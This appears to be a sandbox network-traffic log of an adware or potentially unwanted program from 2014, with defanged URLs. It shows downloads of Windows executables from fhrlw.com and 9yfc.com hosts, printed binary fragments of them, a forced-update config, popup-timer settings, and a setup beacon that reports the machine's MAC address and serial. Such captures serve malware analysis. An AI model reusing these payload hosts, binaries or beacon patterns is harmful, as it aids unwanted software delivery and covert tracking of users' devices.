Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Content-Length: 7434
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:44 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
<html>.<head>.<title></title>.<style>.&l
t;!--.body{margin:0;background-color:transparent;}..sogou{width:460px;
 height:60px;position:relative;overflow:hidden;}.a.logo{display:block;
height:18px;width:26px;text-align:justify;letter-spacing:20px;text-dec
oration:none;overflow:hidden;cursor:default;position:absolute;bottom:0
px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.
AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/s
ogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.int
e.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_backgr
ound:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransf
orm.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.c
om/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url
(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left
 top;_background:none;}..sogou a.normal{}.-->.</style>.</h
ead>..<body>.<iframe id="tanxcmiframe" width="0" height="0
" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></i
frame>.<script type="text/javascript">.var iheight = "60";.va
r fsize = iheight;.if (iheight >= 30).{.    fsize = 30;.}.var mt_pr
eview="0";.if (mt_preview == 1).{..  var height0=60;..  var width0=460
;..  if ((width0==120 && height0==600) || (width0==160 && height0==600
) || (width0==200 && height0==200) || (width0==250 && height0==250) ||
 (width0==300 && height0==250) || (width0==336 && height0==300) ||
<<< skipped >>>


GET /xxdd_165.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: ddl.9yfc.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.12
Date: Sat, 14 Jun 2014 08:56:32 GMT
Content-Type: application/octet-stream
Content-Length: 4409157
Last-Modified: Sat, 31 May 2014 06:56:10 GMT
Connection: keep-alive
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................Z...........0.......p....@.........
.................................................................s....
.......8..............................................................
.............p...............................text....X.......Z........
.......... ..`.rdata.......p.......^..............@[email protected].......
[email protected][email protected].
...8.......:...t..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
..>[email protected].>[email protected]
...Pr@..}[email protected]... M.......M....3.....FQ.....NU..
M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...
[email protected]}[email protected].}.j.W.E......E.......Pp@.
[email protected]@.W...E..E.h [email protected]...\r
@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.
......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=204800-409600
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 204800-409600/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:48 GMT
.gW5#.........1L.fM..TgI..._..(..a.`.. kf........M3....{.K.:\.>....
x....a..e....!.......N=.!.G.d....z..".....aY.=....9...}k$.....=e.....r
.W|.C.Qg..."....sA'...P.RR.....!....9ei.l.....N.....OR>.//..0.=..U.
I.e.......p....*..U......L.2[...q........B.....l.2.mj3^.k.'3..C......I
F.r7.$(F\........8/..|...l..((.;w.)....."q.?...rmG......[(@b.T,Tvy.A.\
.ZJZ...=..#....c.U!X..m.#o.. ..............V....=......3..~.....$.1..K
$B6.petx..!.....z.~6G7..^...l.....?ccM....a.E.........7...........tTJ.
"..%O.........._Lnv....Q-H..0....]..NcQ..'.e..`...7.7.......\...>..
..|.D.K/:>...a...M.......X.z.q....O..[..GP_i....p....l(.\7....<(
..];.. ....\y.F..n?...3..a.....Az..Q...e.z?8.,%.,8.;....I..3......_.,.
sZ..d.../U.....Y1..N.Mu.a.....T....$.B........s....e.:.?...Mmw. .e}..c
.........C....>.....7...-K.^..>..]...kO....;B.D*..._o..9{..{....
x..V ..2.C..e|.....a"C[......S{.......Z......0X.Mff.G.~]%..&C0.||=3;.Z
d....q..o.I.....y{.9v...Jl..kt~.$5ON....3TT.x....b....<....$.b,.G.|
r..../.....i.. ......q$P.P.g#.....0.}..<..GjFx.......QhEr/.f.D..}..
..*.Uu...W^E..)."....gx.VGa.k....4.d~.A|....a.....;...B1.....u.....?..
..}B...{.n..%.`.\...6l...;V.. .]......w.k.=V......VY"...}.L.....ee....
..n..Dn.B..[.....|.".............t..x.mF.#P...._.V.?...I.M;bq.U..{....
(..{..P.7.V...k..k...%...gg..p..-...\$.c$....J..K.I.s.....=e.8v.....Y.
.R....U....%w....{.w......X..uKqCT........e..T<..8.........EB".....
@.....Q.up.[..K..M..a.7..5h.. .t~D.x. .~>b)S5..:..`.....7...Z&.C...
..@P...*<7{H*..d...E*n.....f...x.E)..B.....;;..f..I.j.....k@e..
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:15 GMT
...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F
.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?
..t..1.f.|[email protected]#.~..N..4.9`.x.>.l".q.........x.8...{
Ze>=!s.....}./...$\9<L.p_.n..0.d....8%[email protected]...!"UU...6..p'...
..D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db
.......I....B..\x*.[:.dF..VY....$"..b.".\[email protected]....&w......S..\...
..TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9...
....{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..O
L...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...
I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.
b...n....X;....j.X$D..}....j6..)[email protected].............?F..^...!.....*.w.T
@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>
;. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^&l
t;..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,...
..`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.....
..E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9
.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A..
..#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.
......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.
<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!.
.e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<..
..O.....Q8..g.%..P.Y...`.N...t.#[email protected]=.qWD.7...x
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=0-204800
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 0-204800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:48 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1...u...u...
u.......w...u...........d.......|.......t...Richu...................PE
..L.....UH.................b....... ..o5............@.................
.........P......m.%..................................................@
............$.(.......................................................
.....................................text...x`.......b................
.. ..`.rdata...............f..............@[email protected]..
[email protected]...`...............................rsrc....@....
...B..................@..@............................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected]...\.@
..}..e..9}[email protected]........ M............U....M....3...3..FQ
......3..NU.....M..........VT..U.....FP..E...............E.P.M...H.@..
E...E.P.E.P.u...`[email protected]}[email protected].}.j.W.E..
[email protected][email protected][email protected] [email protected]..
.u....E.P.u...h.@._^3.[.....L$....D...Si.. ..VW.T.....tO.q.3.;5..D.sB.
.i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..D.r._
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1843200-2048000
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1843200-2048000/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:01 GMT
MU/.`...u.<2r.../.h."........j....?.0...:\..xP."?../Y....fA........
.z.*.R..Qq....;Yy(...w*..S.....T.......7..o..D.......9....2.H.o..,.9.m
q.J.'.=`......v>../.o....l.U.2[m.....i.i5Q...$.vi........'.x..SZ..m
p...N..G..].....$YAd..zR....I..P.2....w.r.e....?....:.W.".....n..'&5&l
t;..L.8.).....y....kOc...J.[..h..2..u=_a.-.....P...E5....5.J..5.Udb.).
...[.e..$$D.....M...6..I&.%v:.R.Q......R...$...D..M.IE...w$....,.[.e..
k..n<%!..N...r.v.t; ..F7.....}.IaT.XT..!`...<.....I7.Y..t. '..&l
t;.~m#....E..q.....rZ...{.*&..O.....A..s6j$..;..\.C?.)FZ.K.o.[.1.....7
...eF..KQ..X......R..>4E....<a|5..60..th0.A..k...S-.y.-.m..cE...
.,....;A..K&&.s.e~u.D.X.-..t.....X.X.R..../.*v..V...c[..........f6...&
lt;.......l...]..q...>...,.1dB<...Bt.l..X..r`.=..m..R2..|)#ZP...
...f.%..;/]"<.y_.....y.C.!.@0-.........^..............l....^..<.
p.6.7..n9.'......].....D...z'.....P.....P5b...1..Z.P.Oj.daL.....Dz.._.
\-.|][email protected]..).. L..!..4.)z.m.Z...ng.c%.%....lSh..........W._p*..T.N
.......?...".=..6.......C..t.q..E.<...O......Z.D......h.YM.......M.
R$.S.... .*..9v..Z#.....2:..C....a.3...V .@[email protected]`;xS......6.r]F4..!..
\[email protected].}...x..[..T...U.q.....Z0.._r.r......d......'y...A3Y....4.P=S
...x...].....b.Q..I.H...Tw..^..k.S.=...Y........D...i.]...g...........
b.......;!F*.0....A...ZT..-T&.''.2.[..,...T2..m..T*=..gK8.U.7.m.^?....
..........BZ......C...1~!.g.1....2r...L~..8..z..Gn$...(.\V}. ..../.,.*
.......k:.=...xp.E.s[.y..}....".T..%.;./k.x=3<..io...:2Z..B......8h
m.}..K..>.*..'[email protected]......{n......b..`@...r}.....I$.@
<<< skipped >>>


GET /app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.sogoucdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 042441fc49b4b85c9d202cbbd0c95096
Expires: Sun, 13 Jul 2014 16:07:20 GMT
Cache-Control: max-age=2592000
Last-Modified: Fri, 13 Jun 2014 16:07:20 GMT
4a5b..GIF89a..<...........$..Z.......U..Pw.n...By...............*y.
Nj.....l.n.....s..F........S..2......H.q..HZq....`.'...T.U.....&k....,
M..9i.P.....H.......................... N,.....2........./........_.o.
.........................t.....b..............v.............~fs.5`....
...............w.....y........G~.fw....;v.......Q......e.............~
..g..W...b..&...................F.....>U.9i.&q.(a.....j.....b.i....
.G...b.............{......d..N..........X.......................".....
-B]Bm.Y......6.g...............i.$P....=..5w.0m..e..f..l...J.e.'[."-q.
[email protected]................................<==.b.....b......
......................................................................
......................................................................
..........................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacke
t begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x
="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/
12-17:32:00        "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999
/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpR
ights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.ado
be.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Res
ourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="
False" xmpMM:OriginalDocumentID="adobe:docid:photoshop:3eef0028-c4b0-1
1e1-b872-a278566b4a1b" xmpMM:DocumentID="xmp.did:FFA472CCDC9F11E3B1B4F
5979CC6E9EA" xmpMM:InstanceID="xmp.iid:FFA472CBDC9F11E3B1B4F5979CC
<<< skipped >>>


GET /Update/version.txt?45919992 HTTP/1.1
User-Agent: Update
Host: update.fhrlw.com


HTTP/1.1 200 OK
Content-Length: 72
Content-Type: .txt
Last-Modified: Fri, 13 Jun 2014 08:50:22 GMT
Accept-Ranges: bytes
ETag: "feb72083e486cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:21 GMT
[UpCfg]..Version=1.2.001..Force=1..KillClient=0..MsgTip=0..NoSlience=0
....



GET /app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgstore04.cdn.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 81348f8f42f879e735d0529c30d31e6d
Expires: Mon, 14 Jul 2014 05:41:35 GMT
Cache-Control: max-age=2592000
Last-Modified: Sat, 14 Jun 2014 05:41:35 GMT
bfe2........Exif..II*.................Ducky.......d......hXXp://ns.ado
be.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"
?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5
.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:
rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Descript
ion rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/"
 xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.
adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/x
ap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="adobe:doci
d:photoshop:fa8c3bce-11f1-11e2-97b7-8b5447d4275b" xmpMM:DocumentID="xm
p.did:CD3827A8B5F811E2A6E2F5F05F9AE178" xmpMM:InstanceID="xmp.iid:CD38
27A7B5F811E2A6E2F5F05F9AE178" xmp:CreatorTool="Adobe Photoshop CS6 (Wi
ndows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6430CD75F6
B5E21180C4DCB93A6E3ED6" stRef:documentID="adobe:docid:photoshop:fa8c3b
ce-11f1-11e2-97b7-8b5447d4275b"/> </rdf:Description> </rdf
:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d......
......................................................................
.....................................................................&
lt;...................................................................
................................!...1.A"..Qa.2#.q..B3$...4...b..%5U.&6
FVf.(.Rr.Ccs..e..............................!1..A".Qa.q2#......B..c.'
...Rb.3.r.C...$.%6...S4.7G..Ueu............?..U1........[@i...l..i
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:22 GMT
...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F
.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?
..t..1.f.|[email protected]#.~..N..4.9`.x.>.l".q.........x.8...{
Ze>=!s.....}./...$\9<L.p_.n..0.d....8%[email protected]...!"UU...6..p'...
..D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db
.......I....B..\x*.[:.dF..VY....$"..b.".\[email protected]....&w......S..\...
..TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9...
....{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..O
L...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...
I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.
b...n....X;....j.X$D..}....j6..)[email protected].............?F..^...!.....*.w.T
@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>
;. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^&l
t;..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,...
..`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.....
..E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9
.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A..
..#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.
......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.
<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!.
.e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<..
..O.....Q8..g.%..P.Y...`.N...t.#[email protected]=.qWD.7...x
<<< skipped >>>


GET /api/GetConfig.ashx HTTP/1.1
User-Agent: oemfhsli
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:00:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 330
{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncoun
t":"1","setupcode":"ae9b8922d6184874896f5561d8fe0643","showminitab":"1
","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabra
te":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrd
n.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}HTTP/1.1 200 OK..Dat
e: Sat, 14 Jun 2014 09:00:49 GMT..Server: Microsoft-IIS/6.0..X-Powered
-By: ASP.NET..X-AspNet-Version: 2.0.50727..Cache-Control: private..Con
tent-Type: text/plain; charset=utf-8..Content-Length: 330..{"errno":"1
","bindsoftcount":"0","onlinetimelength":"0","rightdowncount":"1","set
upcode":"ae9b8922d6184874896f5561d8fe0643","showminitab":"1","minitabt
imer":"61","poptabtimer":"48","minitabrate":"180","poptabrate":"68","s
ilentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrdn.com/eYFE"
,"closePopUrl":"hXXp://cnrdn.com/eYFE"}....


GET /api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 HTTP/1.1


User-Agent: oemfhsli
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 38
{"errno":"1","filter":"1","valid":"0"}HTTP/1.1 200 OK..Date: Sat, 14 J
un 2014 09:01:19 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET
..X-AspNet-Version: 2.0.50727..Cache-Control: private..Content-Type: t
ext/plain; charset=utf-8..Content-Length: 38..{"errno":"1","filter":"1
","valid":"0"}..



GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:43 GMT
Content-Type: text/plain
Content-Length: 142
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:43 2014
X-XSS-Protection: 0
Set-Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; expires=Sun, 14-Jun-15 09:00:43 GMT; max-age=31536000; path=/; domain=.sogou.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,.
"m":"MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"0".}}
);HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:43 GMT.
.Content-Type: text/plain..Content-Length: 142..Connection: keep-alive
..Cache-Control: no-cache..Pragma: no-cache..P3P: CP="CURa ADMa DEVa P
SAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..Exp
ires: Mon, 26 Jul 1997 08:00:00 GMT..Last-Modified: Sat Jun 14 17:00:4
3 2014..X-XSS-Protection: 0..Set-Cookie: CXID=700CE21EAACC6D2CC6014D49
26FB9AE8; expires=Sun, 14-Jun-15 09:00:43 GMT; max-age=31536000; path=
/; domain=.sogou.com; version=1..P3P: CP=" OTI DSP COR IVA OUR IND COM
 "..SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":
60,."m":"MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"0
".}});....


GET /ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Content-Length: 7405
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUID=E7F48AC12141900A539C0F3B000F06DC; path=/; expires=Mon, 13 Jun 2016 09:00:43 GMT; domain=sogou.com
Set-Cookie: ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:43 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
<html>.<head>.<title></title>.<style>.&l
t;!--.body{margin:0;background-color:transparent;}..sogou{width:460px;
 height:60px;position:relative;overflow:hidden;}.a.logo{display:block;
height:18px;width:26px;text-align:justify;letter-spacing:20px;text-dec
oration:none;overflow:hidden;cursor:default;position:absolute;bottom:0
px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.
AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/s
ogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.int
e.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_backgr
ound:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransf
orm.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.c
om/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url
(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left
 top;_background:none;}..sogou a.normal{}.-->.</style>.</h
ead>..<body>.<iframe id="tanxcmiframe" width="0" height="0
" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></i
frame>.<script type="text/javascript">.var iheight = "60";.va
r fsize = iheight;.if (iheight >= 30).{.    fsize = 30;.}.var mt_pr
